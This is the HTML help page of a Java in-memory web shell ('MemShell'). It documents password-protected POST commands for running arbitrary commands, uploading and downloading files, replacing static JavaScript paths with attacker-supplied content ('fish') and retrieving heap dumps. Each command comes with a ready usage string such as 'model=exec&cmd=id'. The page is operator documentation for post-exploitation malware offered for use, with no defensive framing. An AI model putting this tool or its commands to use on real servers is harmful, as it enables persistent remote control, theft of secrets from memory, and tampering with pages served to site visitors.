<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>helper</title>
    <style>
        p {
            color: red;
        }
    </style>
</head>
<body>

<h1>models</h1>
<ul>
    <li>exec: execute a command.
        <ol>
            <li>action: null.
                <ul>
                    <li>param: cmd</li>
                    <li><p>info: to execute cmd</p></li>
                    <li>usage: (post) password=xxx&model=exec&cmd=id</li>
                </ul>
            </li>
        </ol>
    </li>
    <li>file: upload and download.
        <ol>
            <li>action: upload
                <ul>
                    <li>param: null.</li>
                    <li><p>info: to show the upload page, use base64 to upload file</p></li>
                    <li>usage: (post) password=xxx&model=file</li>
                </ul>
            </li>
            <li>action: download
                <ul>
                    <li>param: path</li>
                    <li><p>info: to download the file of the path</p></li>
                    <li>usage: (post) password=xxx&model=file&action=download&path=/tmp/java</li>
                </ul>
            </li>
        </ol>
    </li>
    <li>fish: static path agent.
        <ol>
            <li>action: start
                <ul>
                    <li>param: file</li>
                    <li>param: target</li>
                    <li><p>info: use the content of file to agent target path</p></li>
                    <li>usage: (post) password=xxx&model=fish&action=start&file=/tmp/1.js&target=/static/js/1.js</li>
                </ul>
            </li>
            <li>action: stop
                <ul>
                    <li>param: null</li>
                    <li><p>info: stop the fish model</p></li>
                    <li>usage: (post) password=xxx&model=fish&action=stop</li>
                </ul>
            </li>
            <li>action: show
                <ul>
                    <li>param: null</li>
                    <li><p>info: show the information about fish</p></li>
                    <li>usage: (post) password=xxx&model=fish&action=show</li>
                </ul>
            </li>
        </ol>
    </li>
    <li>heapdump: like /actuator/heapdump
        <ol>
            <li>action: null
                <ul>
                    <li>param: null</li>
                    <li><p>info: to get the heapdump file</p></li>
                    <li>usage: (post) password=xxx&model=heapdump</li>
                </ul>
            </li>
        </ol>
    </li>

    <li>exit: exit the MemShell.
    </li>
</ul>

</body>
</html>